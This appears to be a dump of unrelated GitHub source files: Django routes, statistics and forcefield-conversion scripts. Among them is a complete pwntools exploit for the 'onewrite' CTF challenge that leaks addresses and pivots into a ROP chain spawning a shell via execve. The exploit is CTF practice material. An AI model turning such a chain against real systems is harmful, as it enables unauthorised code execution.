3763a13d4467d60994b0eaf0d4b6f867b09314da | 7760d9cddd00041afa308c739fd3de23800c14c6 | /urls.py | 8a34fd657d1dc7da3b829174179b5a434ec7f866 | [] | no_license | IanJames2/LogandReg_Python | 01a9ebd3ad14c9237c37c8010f7523eb43d68b56 | 02fb6d520b173e5ff6af67ff520e7b5dfaeed0f4 | refs/heads/main | 2023-04-19T07:28:26.376232 | 2021-04-29T16:23:55 | 2021-04-29T16:23:55 | 362,627,131 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | from django.urls import path
from . import views
urlpatterns = [
    path('', views.index),  # landing page
    path('login', views.login),
    path('users', views.register),  # NOTE(review): 'users' maps to register — confirm naming
    path('addmovie', views.movie_input),
    path('movie_added', views.added_movie),
    path('logout', views.logout)
]
# NOTE (original author): "dashboard = success" — the success page appears
# to double as the dashboard; unverified.
"noreply@github.com"
] | noreply@github.com |
12c59a6154a461bf8059070f15b4a4dea294ecf4 | e6abe4aca3994c9f98bedb561a522505caff4b7e | /mblog/migrations/0002_auto_20170901_1708.py | d674f72376381be696a04490fe048c76d4c8748f | [] | no_license | has727/newBlog | 093d9f93ed0b78d7de76c7f39f8d99e4831c0970 | 37073ece4c648e136500d727423226cebdf4841e | refs/heads/master | 2021-01-21T12:30:48.474803 | 2017-09-01T09:56:07 | 2017-09-01T09:56:07 | 102,074,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-01 09:08
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Second mblog migration: fix Entry's plural name, add Topic.owner FK."""
    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('mblog', '0001_initial'),
    ]
    operations = [
        # Display "entries" (not the default "entrys") in the admin.
        migrations.AlterModelOptions(
            name='entry',
            options={'verbose_name_plural': 'entries'},
        ),
        # Every topic now belongs to a user; existing rows are pointed at
        # user pk=1 (assumes that user exists — one-off migration default).
        migrations.AddField(
            model_name='topic',
            name='owner',
            field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
            preserve_default=False,
        ),
    ]
| [
"has727@outlook.com"
] | has727@outlook.com |
4816cdf55b4591eae540be22cb3795910608a838 | cf0ae24e1df5e38c0952d5b1eb73799df92b67dd | /user_group/urls.py | 24ae4f995ba232e7ca465df886e4ca99411d0f56 | [] | no_license | gunarevuri/User_Specific_Roles | 8b3f7656261b9a577ba1feb25b6e887a0aa19586 | b679fc2e481cf0204d8fe3447a83ec7bae6627ad | refs/heads/master | 2022-11-30T15:27:30.847116 | 2020-08-16T14:21:15 | 2020-08-16T14:21:15 | 287,444,982 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,675 | py | from django.contrib import admin
from django.contrib.auth import views as auth_views
from django.urls import include
from django.urls import path
from rest_framework_jwt.views import obtain_jwt_token, verify_jwt_token, refresh_jwt_token

from app import views
# Routes for the user_group project: student/teacher CRUD endpoints, the
# stock auth flow (login/logout/password reset) and JWT token endpoints.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.home, name='home'),
    path('select-user/', views.Select_User_type_view, name='select-user'),
    # NOTE(review): 'studet-register' looks like a typo for 'student-register',
    # but changing the URL would break existing links — left as-is.
    path('studet-register/', views.StudentRegestration_view, name='student-register'),
    path('teacher-register/', views.TeacherRegestration_view, name='teacher-register'),
    path('get-all-students/', views.Student_Get_List, name='get-all-students'),
    path('get-student/<int:id>/', views.Student_Get_detail, name='get-student-specific'),
    # Update and delete share the Student_detail / Teacher_detail views.
    path('update-student/<int:id>/', views.Student_detail, name='update-student'),
    path('delete-student/<int:id>/', views.Student_detail, name='delete-student'),
    path('get-all-teachers/', views.Teacher_Get_List, name='get-all-teachers'),
    path('get-teacher/<int:id>/', views.Teacher_Get_detail, name='get-teacher'),
    path('update-teacher/<int:id>/', views.Teacher_detail, name='update-teacher'),
    path('delete-teacher/<int:id>/', views.Teacher_detail, name='delete-teacher'),
    path('add-student/', views.Student_Get_Post_list, name='add-student'),
    # NOTE(review): missing trailing slash, inconsistent with the other routes.
    path('add-teacher', views.Teacher_Get_Post_list, name='add-teacher'),
    path('students/', views.Student_Get_List, name='students'),
    # NOTE(review): 'teachers/' maps to the *detail* view — confirm intent.
    path('teachers/', views.Teacher_Get_detail, name='teachers'),
    path('register/', views.registration_view, name='register'),
    path('login/',
        auth_views.LoginView.as_view(template_name = 'app/login.html'),
        name='login'
        ),
    path('logout/',
        auth_views.LogoutView.as_view(template_name = 'app/logout.html'),
        name='logout'
        ),
    path('password-reset/',
        auth_views.PasswordResetView.as_view(template_name = 'app/password_reset.html'),
        name='password_reset'
        ),
    path('password-reset/done/',
        auth_views.PasswordResetDoneView.as_view(template_name = 'app/password_reset_done.html'),
        name='password_reset_done'
        ),
    path('password-reset-confirm/<uidb64>/<token>/',
        auth_views.PasswordResetConfirmView.as_view(template_name = 'app/password_reset_confirm.html'),
        name='password_reset_confirm'
        ),
    path('password-reset-complete/',
        auth_views.PasswordResetCompleteView.as_view(template_name = 'app/password_reset_complete.html'),
        name='password_reset_complete'
        ),
    # JWT urls implementation
    # BUGFIX: was include("rest_framewor.urls") — a typo — and `include`
    # was never imported (NameError at import time).
    path('api-auth/', include("rest_framework.urls")),
    path('api/token/', obtain_jwt_token, name='obtain-token'),
    path('api/token/verify/', verify_jwt_token, name='verify-token'),
    path('api/token/refresh/', refresh_jwt_token, name='refresh-token'),
]
| [
"gunarevuri@gmail.com"
] | gunarevuri@gmail.com |
5b51126a4fd9d20c0b17017409aed3f5df7dac5d | add47f91c68d6a7f0b1d8f60455594aba7dcf61c | /scripts/main.py | 73887ba21d067dfb0229ea09f68947c9aa194428 | [] | no_license | thejusp/BurnLaptop | 7991a3abcafafb783eeb3019d3403f94158feb95 | 0dda109d3d2971b15bba02fe65d8d962971f1f72 | refs/heads/master | 2021-06-26T01:50:09.513248 | 2021-04-14T14:25:14 | 2021-04-14T14:25:14 | 226,454,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,382 | py | #!/usr/bin/env python
import numpy as np
import datastructure as ds
import scipy.stats as ss
from astropy.table import Table
import matplotlib.pyplot as plt
# Experiment data container (defined in datastructure.py).
datastructure = ds.DataStructure()
# Note: Software Sequences
# [ G1 , G2 , G3 , G4 , G5 ]
# [ SVG, WOT, TSR, PTN, COW]
# One record per (laptop A-E, game G1-G5):
# [IR temperature series, noise series, time axis].
A_G1 = [datastructure.SVG.A.temperatureIR,datastructure.SVG.A.noise,datastructure.SVG.A.time]
B_G1 = [datastructure.SVG.B.temperatureIR,datastructure.SVG.B.noise,datastructure.SVG.B.time]
C_G1 = [datastructure.SVG.C.temperatureIR,datastructure.SVG.C.noise,datastructure.SVG.C.time]
D_G1 = [datastructure.SVG.D.temperatureIR,datastructure.SVG.D.noise,datastructure.SVG.D.time]
E_G1 = [datastructure.SVG.E.temperatureIR,datastructure.SVG.E.noise,datastructure.SVG.E.time]
A_G2 = [datastructure.WOT.A.temperatureIR,datastructure.WOT.A.noise,datastructure.WOT.A.time]
B_G2 = [datastructure.WOT.B.temperatureIR,datastructure.WOT.B.noise,datastructure.WOT.B.time]
C_G2 = [datastructure.WOT.C.temperatureIR,datastructure.WOT.C.noise,datastructure.WOT.C.time]
D_G2 = [datastructure.WOT.D.temperatureIR,datastructure.WOT.D.noise,datastructure.WOT.D.time]
E_G2 = [datastructure.WOT.E.temperatureIR,datastructure.WOT.E.noise,datastructure.WOT.E.time]
A_G3 = [datastructure.TSR.A.temperatureIR,datastructure.TSR.A.noise,datastructure.TSR.A.time]
B_G3 = [datastructure.TSR.B.temperatureIR,datastructure.TSR.B.noise,datastructure.TSR.B.time]
C_G3 = [datastructure.TSR.C.temperatureIR,datastructure.TSR.C.noise,datastructure.TSR.C.time]
D_G3 = [datastructure.TSR.D.temperatureIR,datastructure.TSR.D.noise,datastructure.TSR.D.time]
E_G3 = [datastructure.TSR.E.temperatureIR,datastructure.TSR.E.noise,datastructure.TSR.E.time]
A_G4 = [datastructure.PTN.A.temperatureIR,datastructure.PTN.A.noise,datastructure.PTN.A.time]
B_G4 = [datastructure.PTN.B.temperatureIR,datastructure.PTN.B.noise,datastructure.PTN.B.time]
C_G4 = [datastructure.PTN.C.temperatureIR,datastructure.PTN.C.noise,datastructure.PTN.C.time]
D_G4 = [datastructure.PTN.D.temperatureIR,datastructure.PTN.D.noise,datastructure.PTN.D.time]
E_G4 = [datastructure.PTN.E.temperatureIR,datastructure.PTN.E.noise,datastructure.PTN.E.time]
A_G5 = [datastructure.COW.A.temperatureIR,datastructure.COW.A.noise,datastructure.COW.A.time]
B_G5 = [datastructure.COW.B.temperatureIR,datastructure.COW.B.noise,datastructure.COW.B.time]
C_G5 = [datastructure.COW.C.temperatureIR,datastructure.COW.C.noise,datastructure.COW.C.time]
D_G5 = [datastructure.COW.D.temperatureIR,datastructure.COW.D.noise,datastructure.COW.D.time]
E_G5 = [datastructure.COW.E.temperatureIR,datastructure.COW.E.noise,datastructure.COW.E.time]
# 3-D table: axis 0 = laptop (A-E), axis 1 = game (G1-G5), axis 2 = data
# type (0 temp, 1 noise, 2 time); cells hold the raw series (object dtype).
data_List = np.array([[A_G1, A_G2, A_G3, A_G4, A_G5],
                      [B_G1, B_G2, B_G3, B_G4, B_G5],
                      [C_G1, C_G2, C_G3, C_G4, C_G5],
                      [D_G1, D_G2, D_G3, D_G4, D_G5],
                      [E_G1, E_G2, E_G3, E_G4, E_G5]])
# Note: Mean_Temp_Noise return mean values of data types
# For the current use case, the input "data" has 3 dimensions
# the 1st dimension : no of laptops
# the 2nd dimension : no of Games/Observations
# the last dimension: no of types of data collected (such as temp, noise)
# Therefore,
# Output : mean value of data in 3 dimensions
def mean_Std(data):
    """Reduce raw measurement series to per-cell means plus summary stats.

    Parameters
    ----------
    data : np.ndarray, shape (n_laptops, n_games, n_types), dtype=object
        Each cell holds a sequence of raw readings (e.g. temperature samples).

    Returns
    -------
    (means, grand_means, stds) :
        means       : (n_laptops, n_games, n_types) per-cell means, 2 dp
        grand_means : (n_laptops, n_types) mean over games, 2 dp
        stds        : (n_laptops, n_types) sample std (ddof=1) over games, 2 dp
    """
    n_laptops, n_games, n_types = data.shape
    means = np.zeros(data.shape)
    grand_means = np.zeros((n_laptops, n_types))
    stds = np.zeros((n_laptops, n_types))
    for i in range(n_laptops):
        for j in range(n_games):
            for k in range(n_types):
                # BUGFIX: previously averaged the module-global data_List
                # instead of the `data` argument, silently ignoring the
                # caller's input.
                means[i][j][k] = round(np.mean(data[i, j, k]), 2)
    for lap in range(n_laptops):
        for dt in range(n_types):
            grand_means[lap][dt] = round(np.mean(means[lap, :, dt]), 2)
            stds[lap][dt] = round(np.std(means[lap, :, dt], ddof=1), 2)
    return means, grand_means, stds
# input1 of table function : Table title (string type)
# input2 of table function : dType: 0: temp
# 1: noise
def table(title,dType):
    """Print an astropy Table of per-observation means plus grand mean/std.

    Parameters
    ----------
    title : str
        Caption printed below the table.
    dType : int
        Data column to report: 0 = temperature, 1 = noise.

    Uses the module-level data_List via mean_Std().
    """
    row_names = ['1','2','3','4','5','Mean','Std']
    column_names = ['Observation\Laptop','A','B','C','D','E']
    mean_std = mean_Std(data_List)
    # One row per observation: mean_std[0][laptop, observation, dType].
    # (Replaces the original seven hand-written near-identical tuples.)
    data_Rows = [
        (row_names[obs],) + tuple(mean_std[0][lap, obs, dType] for lap in range(5))
        for obs in range(5)
    ]
    # Summary rows: grand mean and sample std per laptop.
    data_Rows.append((row_names[5],) + tuple(mean_std[1][lap, dType] for lap in range(5)))
    data_Rows.append((row_names[6],) + tuple(mean_std[2][lap, dType] for lap in range(5)))
    # Renamed local (was `table`, shadowing this function's own name).
    result_table = Table(rows=data_Rows, names=column_names)
    print(result_table)
    print(title)
# input1 of anova_Analysis : data_List(Laptops, Games, data such as temp,noise)
# input2 of anova_Analysis : dType (specify data which you want to analyse )
# dType: 0 for Temp, 1 for Noise)
def anova_Analysis(data_list,dType):
    """One-way ANOVA across the five laptops for the chosen data type.

    dType: 0 = temperature, 1 = noise. Prints whether the per-laptop mean
    differences are statistically significant at alpha = 0.05.
    NOTE(review): p == 0.05 exactly prints nothing (if/elif gap).
    """
    dataType = {0: 'Temperatures', 1: 'Noises'}
    mean_data = mean_Std(data_list)
    # Each group is one laptop's five per-game means.
    F,p = ss.f_oneway(mean_data[0][0,:,dType],mean_data[0][1,:,dType],
        mean_data[0][2,:,dType],mean_data[0][3,:,dType],
        mean_data[0][4,:,dType])
    print("\n")
    if(p<0.05):
        print("The mean values of Laptop "+dataType[dType]+""" are
        statistically significant. Therefore, we reject the null
        hypothesis""")
    elif(p>0.05):
        print("The mean values of Laptop "+dataType[dType]+"""  are
        not statistically significant. Therefore, we failed to reject
        the null hypothesis""")
# plot function plot
# input 1 : laptop X you would like to observe( you may refer laptopDict in Fn)
# input 2 : game Y you would ike observe (you may refer gameDict in Fn)
# input 3 : data you would like to plot (you may refer axisDict in Fn)
# input 4 : main data you have to put
def multiplot(laptop,game,data,data_list):
    """Plot one data type against another for laptop/game combinations.

    laptop : iterable of laptop indices (0-4 -> A-E)
    game   : iterable of game indices (0-4 -> G1-G5)
    data   : [x_axis, y_axis] pair of data-type indices
             (0 Temp, 1 Noise, 2 Time)
    data_list : the 3-D measurement table (e.g. data_List)
    """
    plt.figure()
    x_axis = data[0]
    y_axis = data[1]
    laptopDict = {0:'A',1:'B',2:'C',3:'D',4:'E'}
    gameDict = {0:'G1',1:'G2',2:'G3',3:'G4',4:'G5'}
    axisDict = {0:'Temp',1:'Noise',2:'Time'}
    for i in laptop:
        data_label = ' '
        for j in game:
            # Legend label like "A_G3" for each curve.
            data_label = laptopDict[i]+'_'+gameDict[j]
            plt.plot(data_list[i][j][x_axis],data_list[i][j][y_axis],
                label = data_label)
    plt.xlabel(axisDict[x_axis])
    plt.ylabel(axisDict[y_axis])
    plt.legend(loc='upper right')
    plt.show()
def tukeyComparison(data_list,dType):
    """Tukey HSD-style pairwise comparison of laptop means.

    Parameters
    ----------
    data_list : the 3-D measurement table (same shape as data_List).
    dType : int, 0 = temperature, 1 = noise.

    Returns
    -------
    (accepted_Tuple, rejected_Tuple) : lists of (pair_key, |mean diff|)
    sorted by the absolute difference; "rejected" pairs exceed the HSD
    threshold T. Each unordered pair appears twice ('AB' and 'BA').
    """
    # BUGFIX: previously len(data_List[0]) — the module global — instead of
    # the data_list parameter.
    k = len(data_list[0])
    n= k**2
    dof = [k,n-k]
    # q table is read from the following link
    #https://www2.stat.duke.edu/courses/Spring98/sta110c/qtable.html
    q_critical_0_05 = 4.23
    mean_std = mean_Std(data_list)
    # NOTE(review): this loop overwrites SSW/MSW/T each iteration, so T ends
    # up based on the LAST laptop's std only — looks unintended, but left
    # unchanged to preserve the published results; confirm before fixing.
    for each in mean_std[2][:,dType]:
        SSW = (k-1)*each**2
        MSW = SSW/dof[1]
        T = q_critical_0_05*np.sqrt(MSW/k)
    mean = mean_std[1][:,dType]
    rejected_Dict = {}
    accepted_Dict = {}
    laptop_Dict = {0:'A',1:'B',2:'C',3:'D',4:'E'}
    for i in laptop_Dict.keys():
        for j in laptop_Dict.keys():
            diff = round(mean[i]-mean[j],2)
            key = laptop_Dict.get(i)+laptop_Dict.get(j)
            if(abs(diff)==0):
                pass
            elif(abs(diff)>T):
                rejected_Dict.update({key:abs(diff)})
            elif(abs(diff)<T):
                accepted_Dict.update({key:abs(diff)})
    accepted_Tuple = sorted(accepted_Dict.items(), key=lambda diff: abs(diff[1]))
    rejected_Tuple = sorted(rejected_Dict.items(), key=lambda diff: abs(diff[1]))
    # Idiom fix: plain for-loops instead of list comprehensions used purely
    # for their print side effects.
    for each in accepted_Tuple:
        print("Accepted Pair",each)
    print("\n")
    for each in rejected_Tuple:
        print("Rejected Pair",each)
    return accepted_Tuple, rejected_Tuple
# --- Driver: report temperature (dType=0) and noise (dType=1) results ---
table("Table 1: Temperature of Laptops across 5 observations",0)
print("\n")
table("Table 2: Noise of Laptops across 5 observations",1)
anova_Analysis(data_List,0)
anova_Analysis(data_List,1)
# Plot Time (axis 2) on x vs Noise (axis 1) on y for all laptops/games.
multiplot([0,1,2,3,4],[0,1,2,3,4],[2,1],data_List)
result = tukeyComparison(data_List,0)
| [
"thejus@lionsbot.com"
] | thejus@lionsbot.com |
6a4675054e6b1622b80d37ae794ec9fbb98e9ef6 | bdd2bbef297d6edd3d335c48ab89955925d331d5 | /encyclopedia/urls.py | 5f0ded8610846862e5b0f87a8029d45d825b1c9c | [] | no_license | michelle2014/CS50W-Wiki | 424569bb1e2fd7c83fa7ff2a98c51821bcfc04fb | 0301e48db06720b0419c5939816a9be345dff9b0 | refs/heads/master | 2023-07-28T05:05:42.512177 | 2021-09-05T05:33:06 | 2021-09-05T05:33:06 | 327,516,261 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | from django.urls import path
from . import views
urlpatterns = [
    path("", views.index, name="index"),
    path("create", views.create, name="create"),
    path("edit/<str:title>", views.edit, name="edit"),
    path("search", views.search, name="search"),
    # Catch-all entry page: must stay last so it doesn't shadow the fixed
    # routes above.
    path("<str:title>", views.entry, name="entry")
] | [
"michelle.transbetter@gmail.com"
] | michelle.transbetter@gmail.com |
a7a105f0306eb834baeef78f4a9c96a64ce5032b | 3df5a2ff77403c077199853c0fa7afe49c290568 | /python/smache/exceptions.py | bf0ce2c7caa4d87bf4aeae1138233f7fdab0a001 | [] | no_license | bruce2008github/smache | d3370b494b411790e17088014c40347838aaf97b | be34b7370ef946a01293dd8e539bf976d25cf4f4 | refs/heads/master | 2021-01-18T21:00:07.097570 | 2011-01-03T16:59:47 | 2011-01-03T16:59:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | #!/usr/bin/env python
class SmacheException(Exception):
    # Idiom: docstring body replaces the redundant `pass`.
    """Base class for all smache errors."""
class ConfigException(SmacheException):
    # Idiom: docstring body replaces the redundant `pass`.
    """Smache error raised from configuration handling."""
class BackendException(SmacheException):
    # Idiom: docstring body replaces the redundant `pass`.
    """Smache error raised from a storage backend."""
| [
"amscanne@adin-ubuntu-dev.(none)"
] | amscanne@adin-ubuntu-dev.(none) |
80e3880492a040c298690f13180e5e63662152df | 8be5db190392dc87ab24584b0a3518329320ac8a | /fid/utils/printing.py | 52d7c24a2a6bb66ac8d592439d8545e4c9749234 | [
"MIT"
] | permissive | jma100/SPADE_eval | 6eccead21879bf5195e82d2dfb45ca79c2599de3 | 73ae45e79a7296651e9ea4091bffaf5b154d15ec | refs/heads/master | 2020-09-25T23:31:00.828438 | 2019-12-05T17:53:40 | 2019-12-05T17:53:40 | 226,113,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | import torch
# TODO: add zero padded int
def format_str_one(v, float_prec=6):
    """Render one value as a string.

    A one-element torch tensor is unwrapped to its Python scalar first.
    Floats are formatted with `float_prec` decimal places; every other
    type falls back to str().
    """
    if isinstance(v, torch.Tensor) and v.numel() == 1:
        v = v.item()
    if not isinstance(v, float):
        return str(v)
    return ('{:.' + str(float_prec) + 'f}').format(v)
def format_str(*args, format_opts=None, **kwargs):
    """Join formatted values with tab characters.

    Positional args are rendered with format_str_one; keyword args are
    rendered as "key: value" pairs. `format_opts` (e.g. {'float_prec': 3})
    is forwarded to format_str_one.
    """
    # BUGFIX: the default was a shared mutable dict ({}); use a None
    # sentinel instead (backward-compatible for all callers).
    opts = {} if format_opts is None else format_opts
    ss = [format_str_one(arg, **opts) for arg in args]
    for k, v in kwargs.items():
        ss.append('{}: {}'.format(k, format_str_one(v, **opts)))
    return '\t'.join(ss)
| [
"jingweim@visiongpu22.csail.mit.edu"
] | jingweim@visiongpu22.csail.mit.edu |
1de610a31728f101b5dad9f241a84f4d1262e52b | 66a262fe264882adfdd45c2e7507988f4b4f1954 | /2019-INSomnihack-teaser/onewrite/onewrite.py | 542e338c812fa4b11b4966f9f2f8cd5fd6f203e6 | [] | no_license | Nepire/Pwn-Collection | 1b5bfb6a5a6171da0ccae970caf16d39507d54b4 | 3a63710e66683c117918fc716079acdafd010010 | refs/heads/master | 2020-03-15T23:50:05.645571 | 2019-03-11T06:46:23 | 2019-03-11T06:46:23 | 132,401,669 | 0 | 0 | null | 2019-01-26T15:37:05 | 2018-05-07T03:22:03 | Python | UTF-8 | Python | false | false | 5,436 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author = nepire
#
# Distributed under terms of the MIT license.
from pwn import*
# pwntools setup: 64-bit Linux target, verbose logging.
context(os='linux',arch='amd64',log_level='debug')
# Local process; swap for the remote() line to attack the live service.
n = process('./onewrite')
#n = remote('onewrite.teaser.insomnihack.ch',1337)
elf = ELF('./onewrite')
def leak_stack():
    """Pick menu option 1 to leak a stack address; returns it as an int
    (the binary prints it in hex)."""
    n.recvuntil('>')
    n.sendline("1")
    return int(n.recvuntil('\n'),16)
def leak_pie():
    """Pick menu option 2 to leak a code (PIE) address; returns it as an
    int (the binary prints it in hex)."""
    n.recvuntil('>')
    n.sendline('2')
    return int(n.recvuntil('\n'),16)
def write(addr,data):
    """Drive the binary's write primitive: send the target address (as a
    decimal string), then the raw bytes to store there."""
    n.recvuntil('address :')
    n.send(str(int(addr)))
    n.recvuntil('data : ')
    n.send(data)
def write_bss(idx):
    """Write the idx-th 8-byte slice of the global `rop` chain to
    bss_addr + 8*idx (uses globals bss_addr and rop).

    NOTE(review): the leak_stack() result is discarded — presumably the
    call is needed to step the menu back to the write prompt; confirm.
    """
    i = 8*idx
    stack = leak_stack()
    write(bss_addr+i,rop[i:i+8])
# --- Stage 1: leak, partial-overwrite back into do_leak, compute bases ---
# NOTE(review): main_addr is only assigned further down, so this first loop
# references it before definition as written; it mirrors the identical loop
# after the ROP chain is built. Left in place to preserve the published
# exploit flow — confirm against the original binary.
for i in range(2):
    stack = leak_stack()
    log.success(hex(stack))
    ret = stack - 8
    write(ret,p64(main_addr))
stack = leak_stack()
log.success(hex(stack))
ret = stack - 8
# Single-byte partial overwrite of the saved return address:
write(ret,'\x15') # 0x7ffff7d52ab2 (do_leak+157) -> 0x7ffff7d52a15 (do_leak)
pie = leak_pie()
# 0x8a15 is do_leak's file offset, so this recovers the PIE base.
codebase = pie - 0x8a15
log.success(hex(codebase))
##### leak stack codebase && edit ret ####
bss_addr = codebase + elf.bss()
main_addr = codebase + 0x8ab8
# Helper: rebase a gadget offset and pack it as a qword.
pb = lambda x : p64(x + codebase)
# execve("/bin//sh", 0, 0) chain: store "/bin//sh" and a NULL qword in
# .data, load rdi/rsi/rdx, set rax = 59 (SYS_execve), syscall.
rop = pb(0x000000000000d9f2) # pop rsi ; ret
rop += pb(0x00000000002b1120) # @ .data
rop += pb(0x00000000000460ac) # pop rax ; ret
rop += '/bin//sh'
rop += pb(0x0000000000077901) # mov qword ptr [rsi], rax ; ret
rop += pb(0x000000000000d9f2) # pop rsi ; ret
rop += pb(0x00000000002b1128) # @ .data + 8
rop += pb(0x0000000000041360) # xor rax, rax ; ret
rop += pb(0x0000000000077901) # mov qword ptr [rsi], rax ; ret
rop += pb(0x00000000000084fa) # pop rdi ; ret
rop += pb(0x00000000002b1120) # @ .data
rop += pb(0x000000000000d9f2) # pop rsi ; ret
rop += pb(0x00000000002b1128) # @ .data + 8
rop += pb(0x00000000000484c5) # pop rdx ; ret
rop += pb(0x00000000002b1128) # @ .data + 8
rop += pb(0x0000000000041360) # xor rax, rax ; ret
# rax = 59 == SYS_execve; bump one at a time, 59 times (replaces the 59
# duplicated "add rax, 1" lines in the original).
rop += pb(0x000000000006d940) * 59 # add rax, 1 ; ret
rop += pb(0x000000000006e605) # syscall ; ret
# Number of 8-byte chain slots. '//' is identical to '/' under this
# Python 2 script but stays an int under Python 3 too.
gadgetlen = len(rop) // 8
############ loading gadget ##############
#idx0
write(bss_addr,rop[0:8])
# Return to main twice so the write primitive can be reused.
for i in range(2):
    stack = leak_stack()
    log.success(hex(stack))
    ret = stack - 8
    write(ret,p64(main_addr))
#idx 1-last
for i in range(1,gadgetlen):
    write_bss(i)
########### write gadget in bss ############
# Stack pivot: plant a "pop rsp ; ret" gadget and the chain's address in
# the saved-register area so execution continues in .bss.
pop_rsp_ret = codebase + 0x946a
stack = leak_stack()
log.success(hex(stack))
write(stack+0x38,p64(pop_rsp_ret))
stack = leak_stack()
log.success(hex(stack))
write(stack+0x20,p64(bss_addr))
########### jmp bss getshell #############
n.interactive()
| [
"3066574695@qq.com"
] | 3066574695@qq.com |
22ee7ccbcbad29146f0ad48648691bdaa31a3adc | 97db95833780dad8537a647a7ff90d0e2eeec686 | /forcefields/alkanes/propane/TRAPPE2FESST_2.0.py | f4e1a6c1fc7b4a0f5bbf761a591f06571fb51549 | [] | no_license | chr218/TRAPPE_ff_FEASST | 3c21460f8f353bb0a72a2664d156b32c508ba7eb | afcf7717b11c62f61e39b8285b0ea3053ac215ec | refs/heads/main | 2022-12-31T23:03:38.624039 | 2020-10-23T05:27:22 | 2020-10-23T05:27:22 | 305,815,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,146 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
The purpose of this code is to convert the parameters taken from Siepmann's
website (TRAPPE-UA) into FEASST readable input files. The input files are
restricted to rigid molecules.
Author: Christopher Rzepa
email: cvr5246@gmail.com
"""
import numpy as np
import time
import sys
from scipy import constants
from ase.data.pubchem import pubchem_atoms_search
from ase.geometry.analysis import Analysis
'''
Constants
'''
# CODATA constants from scipy; each physical_constants entry is a
# (value, unit, uncertainty) tuple, so the numeric value is e.g. NA[0].
NA = constants.physical_constants['Avogadro constant']
kB = constants.physical_constants['Boltzmann constant']
#print(constants.calorie)
'''
Functions & Subroutines
'''
def get_psuedoatoms(atoms_obj,TRAP_atms,TRAP_bonds):
ana_H = Analysis(atoms_obj)
#Collect bond distances from ASE atoms.-Find easier way to do this!
ASE_bond_dist = []
ASE_bond_atms = []
atm_bonds_list = ana_H.unique_bonds[0]
for index, atm_bonds in enumerate(atm_bonds_list):
for neighbor in atm_bonds:
dist = np.linalg.norm(atoms_obj[index].position-atoms_obj[neighbor].position)
ASE_bond_dist.append(dist)
ASE_bond_atms.append([index,neighbor])
H_index = []
ASE_bond_atms_cp = ASE_bond_atms.copy()
ASE_bond_dist_cp = ASE_bond_dist.copy()
atoms_obj_cp = atoms_obj.copy()
#If "H" is in psuedo potentials, we must include it and collect it's index.
if 'H' in TRAP_atms[:,1]:
for bond in TRAP_bonds:
if 'H' in bond[2].split('-'):
H_bond_dist = float(bond[3])
indx, value = find_nearest(ASE_bond_dist_cp,H_bond_dist)
for i in (ASE_bond_atms_cp[indx]):
if atoms_obj_cp[i].symbol == 'H':
H_index.append(atoms_obj_cp[i].index)
ASE_bond_atms_cp.pop(indx)
ASE_bond_dist_cp.pop(indx)
#Determine hybridization. "atoms_C" does not strictly apply to carbon atoms.
atoms_H = atoms_obj.copy()
del atoms_H[[atom.index for atom in atoms_H if not atom.symbol=='H']]
atoms_C = atoms_obj.copy()
del atoms_C[[atom.index for atom in atoms_C if atom.symbol=='H' and atom.index not in H_index]]
for i,C in enumerate(atoms_C):
hybridization = 0
if C.symbol == 'C':
for j,H in enumerate(atoms_H):
if np.linalg.norm(C.position-H.position) < 1.2:
hybridization += 1
atoms_C[i].mass += hybridization*(atoms_H[0].mass)
atoms_C[i].tag = hybridization
return atoms_C
def get_TRAPPE_params(fname):
main_full = []
main = []
f = open(fname,"r")
for line in f:
stripped_line = line.strip()
if stripped_line == '': #Skip new lines
continue
else:
main.append(stripped_line.split(','))
main_full.append(stripped_line.split(' '))
f.close()
TRAPPE_name = main_full[0]
TRAPPE=[[],[]] #List constaining TRAPPE atoms [0] and TRAPPE bonds [1] info.
for i, line in enumerate(main):
if 'stretch' in line:
j = i
while '#' not in main[j+1]:
TRAPPE[1].append(main[j+1])
j += 1
if '(pseudo)atom' in line:
j = i
while '#' not in main[j+1]:
TRAPPE[0].append(main[j+1])
j += 1
#Convert TRAPPE list into array for psuedoatoms and array for bonds:
TRAPPE_atoms_arr = (np.asarray(TRAPPE[0]).reshape((len(TRAPPE[0]),len(TRAPPE[0][0]))))
TRAPPE_bonds_arr = (np.asarray(TRAPPE[1]).reshape((len(TRAPPE[1]),len(TRAPPE[1][0]))))
return TRAPPE_atoms_arr, TRAPPE_bonds_arr, TRAPPE_name
#Used within "Order_atoms_wrt_TRAPPE" to find closest matching bond distance.
def find_nearest(array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx, array[idx]
#Orders the ASE atom indieces w.r.t TRAPPE atom indices.
def Order_atoms_wrt_TRAPPE(ASE_atms, ASE_geom, TRAP_bonds,TRAP_atms):
#Create list of psuedoatom strings.
ASE_hybrid_list = []
for i, atm in enumerate(ASE_atms):
if atm.symbol =='C':
if atm.tag == 0:
ASE_hybrid_list.append('C')
elif atm.tag == 1:
ASE_hybrid_list.append('CH')
else:
ASE_hybrid_list.append('CH' + str(atm.tag))
elif atm.symbol != 'C':
ASE_hybrid_list.append(atm.symbol)
#Collect bond distances from ASE atoms.-Find easier way to do this!
ASE_bond_dist_list = []
ASE_bond_atms = []
ASE_bond_hybrids = []
atm_bonds_list = ana.unique_bonds[0]
for index, atm_bonds in enumerate(atm_bonds_list):
for neighbor in atm_bonds:
dist = np.linalg.norm(psuedo_atoms[index].position-psuedo_atoms[neighbor].position)
ASE_bond_dist_list.append(dist)
ASE_bond_atms.append([index,neighbor])
ASE_bond_hybrids.append([ASE_hybrid_list[index],ASE_hybrid_list[neighbor]])
